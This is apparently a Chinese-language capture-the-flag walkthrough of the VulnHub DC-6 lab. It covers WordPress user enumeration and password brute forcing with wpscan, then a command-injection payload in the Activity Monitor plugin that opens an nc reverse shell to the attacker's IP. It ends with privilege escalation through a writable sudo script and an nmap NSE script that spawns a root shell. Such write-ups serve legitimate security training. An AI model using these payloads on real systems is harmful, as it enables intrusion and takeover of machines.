vulnhub-dc6

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机，设置为同一种nat模式

kali 信息收集主机发现

arp-scan -l

靶机开放了22.80端口 直接访问80，无反应， 需要改hosts文件

vim /etc/hosts 打开hosts配置文件，然后重启一下服务 然后就可以正常访问了。

同DC2类似 扫描目录，发现登录后台界面

dirb http://192.168.1.222 

暴力破解
wpscan扫描出账号保存至dc6.txt

wpscan --url http://wordy -e u

kali 自带字典爆破用户密码

wpscan --url http://wordy -P passwords.txt -U dc6.txt

kali 自带字典路径 /usr/share/wordlists/ ，解压rockyou.txt.gz

cat rockyou.txt | grep k01 > wordy-pass1.dic
wpscan --url wordy -U dc6.txt -P wordy-pass1.dic

Username: mark, Password: helpdesk01 登录后，发现可以利用Activity monitor

searchsploit activity monitor   

在activity monitor目录的tools一栏存在可注入的点

burp抓包，更改souhu.com|whoami 发现存在漏洞

修改数据包为souhu.com|nc -e /bin/bash 192.168.1.162 7777，nc监听

souhu.com|souhu.com|nc -e /bin/bash 192.168.1.162 7777

交互式：python -c 'import pty;pty.spawn("/bin/bash")'

在mark目录下存在一个things-to-do文件，打开发现了graham的账号密码

通过ssh连接

尝试一下sudo -l出现了免密的jens的命令，进入/home/jens目录，打开backups.sh文件

echo '/bin/bash' >> backups.sh #在文件中添加命令行
sudo -u jens ./backups.sh     #-u 指定用户
echo 'os.execute("/bin/sh")' >getshell.nse #写一个root shell的文件
sudo nmap --script=getshell.nse #运行

发现打字没有显示，查看root文件夹下的theflag.txt文件

参考链接

https://blog.youkuaiyun.com/xdbzdgx/article/details/121589649